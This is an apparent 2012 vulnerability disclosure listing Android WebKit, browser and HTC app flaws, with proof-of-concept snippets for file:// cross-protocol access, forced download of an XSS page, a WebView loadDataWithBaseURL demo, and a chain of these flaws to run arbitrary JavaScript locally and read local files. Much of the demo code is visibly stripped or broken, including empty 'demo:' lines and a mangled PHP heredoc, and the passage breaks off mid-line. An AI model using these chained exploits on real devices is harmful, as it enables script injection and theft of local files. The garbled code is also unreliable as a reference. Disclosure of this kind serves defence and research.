Android Multiple Vulnerabilities
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt
Ph4nt0m Webzine 0x06 has been
released[http://www.80vul.com/webzine_0x06/],there
three papers on the android application security about the development
environment,browser security, inter-application communication.And published
a lot of 0days:
[0day-NO.0] android-webkit local cross-domain vulnerability
android-webkit allow local html files cross any http domain and the local
file.demo:
[0day-NO.1] android-webkit cross-protocol vulnerability
this vul allow cross to the file protocol from http. demo:
location.php codz:
[0day-NO.2] android-webkit file:// protocol xss vulnerability
ON android-webkit File:// protocol, the lack of filtering on the directory
and file name,Lead to cross-site scripting attacks. demo:
visit this : file:///80vul.com/
[0day-NO.3] android-browser/firefox auto download the file vulnerability
android-browser/firefox Handle the Content-Disposition: attachment, lack of
safety tips.So through this vul allows users to automatically download the
evil html file to the local directory.
test this code:
//autodown.php
header("Content-Disposition: attachment:filename=autodown.htm");
$data=<<alert(/xss/);
android_xss_go;
print $data;
?>
the local file name and the path:
android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox --> /sdcard/download/autodown.php
So,Let's play a jigsaw puzzle:
POC[1]:
//[0day-NO.1]+[0day-NO.2]
POC[2]:
//[0day-NO.1]+[0day-NO.3]
Now ,We can execute arbitrary js code on the local domain, and we can cross
any http domain and the local file used [0day-NO.0].
and go on ...
[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability
By controlling the second argument of webview.loadDataWithBaseURL(),can
cross the file:// protocol use javascript,like
.so the dome apk
demo:
WebView webview;
webview = (WebView) findViewById(R.id.webview);
webview.getSettings().setJavaScriptEnabled(true);
webview.setWebChromeClient(new WebChromeClient());
String
data="80vul";
webview.loadDataWithBaseURL("http://www.baidu.com/", data,
"text/html", "utf-8", null);
[0day-NO.5] com.htc.googlereader XSS vulnerability
com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on
this app, then Decompilation and Found this codz:
label399: String str = this.mHeadlineShown.getSummary();
if (str.trim().contains("